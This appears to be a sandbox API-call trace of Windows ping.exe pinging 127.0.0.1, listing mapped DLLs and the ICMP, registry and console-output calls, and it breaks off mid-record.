Region: id = 3312 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3313 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3314 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3315 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3316 start_va = 0xb0000 end_va = 0xbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3317 start_va = 0xc0000 end_va = 0xc3fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3318 start_va = 0x1d0000 end_va = 0x24dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3319 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3320 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3321 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3322 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3323 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3324 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3325 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3326 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3327 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3328 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3329 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3330 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3331 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3332 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3333 start_va = 0x7f9c0000 end_va = 0x7fabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9c0000" filename = "" Region: id = 3334 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3335 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3336 start_va = 0x7fae6000 end_va = 0x7fae8fff entry_point = 0x0 region_type = private name = "private_0x000000007fae6000" filename = "" Region: id = 3337 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3338 start_va = 0xd0000 end_va = 0xd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3339 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3340 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x1b0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 3341 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3342 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3343 start_va = 0x7fae3000 end_va = 0x7fae5fff entry_point = 0x0 region_type = private name = "private_0x000000007fae3000" filename = "" Thread: id = 196 os_tid = 0xb80 [0078.583] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0078.583] __set_app_type (_Type=0x1) [0078.583] __p__fmode () returned 0x76ea1768 [0078.583] __p__commode () returned 0x76ea176c [0078.583] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0078.583] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0078.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.586] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.586] _fileno (_File=0x76ea4c28) returned 1 [0078.586] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.586] GetFileType (hFile=0x28) returned 0x2 [0078.586] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4e8 | out: lpMode=0x16f4e8) returned 0 [0078.586] GetLastError () returned 0x6 [0078.586] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f44c, nSize=0x50 | out: lpBuffer="䤐2") returned 0x0 [0078.586] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0078.588] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x16f504 | out: phkResult=0x16f504*=0x88) returned 0x0 [0078.588] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x16f4f8, lpData=0x16f500, lpcbData=0x16f4fc*=0x4 | out: lpType=0x16f4f8*=0x0, lpData=0x16f500*=0x0, lpcbData=0x16f4fc*=0x4) returned 0x2 [0078.588] RegCloseKey (hKey=0x88) returned 0x0 [0078.588] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x16f4c8*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x16f504 | out: ppResult=0x16f504*=0x32c480*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x328a60*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0078.588] FreeAddrInfoW (pAddrInfo=0x32c480*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x328a60*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0078.588] IcmpCreateFile () returned 0x326b80 [0078.591] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x32c4d0 [0078.591] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x335270 [0078.591] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x16f600, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0078.592] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="竈3ﻌ\x16┗\x94䰨盪❋") returned 0x14 [0078.592] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.592] _fileno (_File=0x76ea4c28) returned 1 [0078.592] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.593] GetFileType (hFile=0x28) returned 0x2 [0078.593] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0078.593] GetLastError () returned 0x6 [0078.593] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16❋") returned 0x0 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0078.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.593] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x337b00 [0078.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x337b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _write (in: _FileHandle=1, _Buf=0x337b00*, _MaxCharCount=0x14 | out: _Buf=0x337b00*) returned 20 [0078.593] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0078.593] LocalFree (hMem=0x337b00) returned 0x0 [0078.593] LocalFree (hMem=0x337ac8) returned 0x0 [0078.593] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="竈3ﻌ\x16▪\x94䰨盪❚") returned 0x18 [0078.593] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.593] GetFileType (hFile=0x28) returned 0x2 [0078.593] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0078.593] GetLastError () returned 0x6 [0078.593] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16❚") returned 0x0 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0078.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0078.593] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x32c278 [0078.593] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x32c278, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _write (in: _FileHandle=1, _Buf=0x32c278*, _MaxCharCount=0x18 | out: _Buf=0x32c278*) returned 24 [0078.593] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.593] _fileno (_File=0x76ea4c28) returned 1 [0078.593] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0078.593] LocalFree (hMem=0x32c278) returned 0x0 [0078.593] LocalFree (hMem=0x337ac8) returned 0x0 [0078.593] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0078.593] IcmpSendEcho2Ex (in: IcmpHandle=0x326b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x32c4d0, RequestSize=0x20, RequestOptions=0x16f574, ReplyBuffer=0x335270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x335270) returned 0x1 [0078.594] InetNtopW (in: Family=2, pAddr=0x16f564, pStringBuf=0x16f68c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0078.594] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="笈3ﻌ\x16⛔\x94䰨盪✣") returned 0x16 [0078.594] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.594] _fileno (_File=0x76ea4c28) returned 1 [0078.594] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.594] GetFileType (hFile=0x28) returned 0x2 [0078.594] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0078.594] GetLastError () returned 0x6 [0078.594] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✣") returned 0x0 [0078.594] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0078.595] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0078.595] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x337b40 [0078.595] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x337b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _write (in: _FileHandle=1, _Buf=0x337b40*, _MaxCharCount=0x16 | out: _Buf=0x337b40*) returned 22 [0078.595] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0078.595] LocalFree (hMem=0x337b40) returned 0x0 [0078.595] LocalFree (hMem=0x337b08) returned 0x0 [0078.595] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="笈3ﻌ\x16⛿\x94䰨盪✼") returned 0x9 [0078.595] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.595] GetFileType (hFile=0x28) returned 0x2 [0078.595] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0078.595] GetLastError () returned 0x6 [0078.595] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✼") returned 0x0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0078.595] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.595] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3289b8 [0078.595] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x3289b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _write (in: _FileHandle=1, _Buf=0x3289b8*, _MaxCharCount=0x9 | out: _Buf=0x3289b8*) returned 9 [0078.595] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0078.595] LocalFree (hMem=0x3289b8) returned 0x0 [0078.595] LocalFree (hMem=0x337b08) returned 0x0 [0078.595] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f4fc, nSize=0x0, Arguments=0x16f4f8 | out: lpBuffer="笈3ﻌ\x16➷\x94䰨盪✧") returned 0x9 [0078.595] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.595] GetFileType (hFile=0x28) returned 0x2 [0078.595] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4c0 | out: lpMode=0x16f4c0) returned 0 [0078.595] GetLastError () returned 0x6 [0078.595] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f424, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0078.595] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.595] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x328a60 [0078.595] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x328a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _write (in: _FileHandle=1, _Buf=0x328a60*, _MaxCharCount=0x9 | out: _Buf=0x328a60*) returned 9 [0078.595] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.595] _fileno (_File=0x76ea4c28) returned 1 [0078.595] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0078.595] LocalFree (hMem=0x328a60) returned 0x0 [0078.595] LocalFree (hMem=0x337b08) returned 0x0 [0078.596] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="笈3ﻌ\x16⟘\x94䰨盪✨") returned 0x9 [0078.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.596] _fileno (_File=0x76ea4c28) returned 1 [0078.596] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.596] GetFileType (hFile=0x28) returned 0x2 [0078.596] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0078.596] GetLastError () returned 0x6 [0078.596] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✨") returned 0x0 [0078.596] _fileno (_File=0x76ea4c28) returned 1 [0078.596] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0078.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.596] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x328a60 [0078.596] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x328a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0078.596] _fileno (_File=0x76ea4c28) returned 1 [0078.596] _write (in: _FileHandle=1, _Buf=0x328a60*, _MaxCharCount=0x9 | out: _Buf=0x328a60*) returned 9 [0078.596] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0078.596] _fileno (_File=0x76ea4c28) returned 1 [0078.596] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0078.596] LocalFree (hMem=0x328a60) returned 0x0 [0078.596] LocalFree (hMem=0x337b08) returned 0x0 [0078.596] Sleep (dwMilliseconds=0x3e8) [0079.607] IcmpSendEcho2Ex (in: IcmpHandle=0x326b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x32c4d0, RequestSize=0x20, RequestOptions=0x16f574, ReplyBuffer=0x335270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x335270) returned 0x1 [0079.608] InetNtopW (in: Family=2, pAddr=0x16f564, pStringBuf=0x16f68c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0079.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="羠3ﻌ\x16⛔\x94䰨盪✣") returned 0x16 [0079.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.608] _fileno (_File=0x76ea4c28) returned 1 [0079.608] _get_osfhandle (_FileHandle=1) returned 0x28 [0079.608] GetFileType (hFile=0x28) returned 0x2 [0079.608] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0079.608] GetLastError () returned 0x6 [0079.608] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✣") returned 0x0 [0079.608] _fileno (_File=0x76ea4c28) returned 1 [0079.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0079.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0079.608] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x337fd8 [0079.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x337fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0079.608] _fileno (_File=0x76ea4c28) returned 1 [0079.608] _write (in: _FileHandle=1, _Buf=0x337fd8*, _MaxCharCount=0x16 | out: _Buf=0x337fd8*) returned 22 [0079.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.608] _fileno (_File=0x76ea4c28) returned 1 [0079.608] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0079.608] LocalFree (hMem=0x337fd8) returned 0x0 [0079.608] LocalFree (hMem=0x337fa0) returned 0x0 [0079.608] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x16f4f8, nSize=0x0, Arguments=0x16f4f4 | out: lpBuffer="羠3ﻌ\x16⛿\x94䰨盪✼") returned 0x9 [0079.608] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _get_osfhandle (_FileHandle=1) returned 0x28 [0079.609] GetFileType (hFile=0x28) returned 0x2 [0079.609] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4bc | out: lpMode=0x16f4bc) returned 0 [0079.609] GetLastError () returned 0x6 [0079.609] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f420, nSize=0x50 | out: lpBuffer="\x16✼") returned 0x0 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0079.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.609] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x328a60 [0079.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x328a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _write (in: _FileHandle=1, _Buf=0x328a60*, _MaxCharCount=0x9 | out: _Buf=0x328a60*) returned 9 [0079.609] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0079.609] LocalFree (hMem=0x328a60) returned 0x0 [0079.609] LocalFree (hMem=0x337fa0) returned 0x0 [0079.609] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x16f4fc, nSize=0x0, Arguments=0x16f4f8 | out: lpBuffer="羠3ﻌ\x16➷\x94䰨盪✧") returned 0x9 [0079.609] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _get_osfhandle (_FileHandle=1) returned 0x28 [0079.609] GetFileType (hFile=0x28) returned 0x2 [0079.609] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x16f4c0 | out: lpMode=0x16f4c0) returned 0 [0079.609] GetLastError () returned 0x6 [0079.609] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x16f424, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0079.609] _fileno (_File=0x76ea4c28) returned 1 [0079.609] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0079.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, 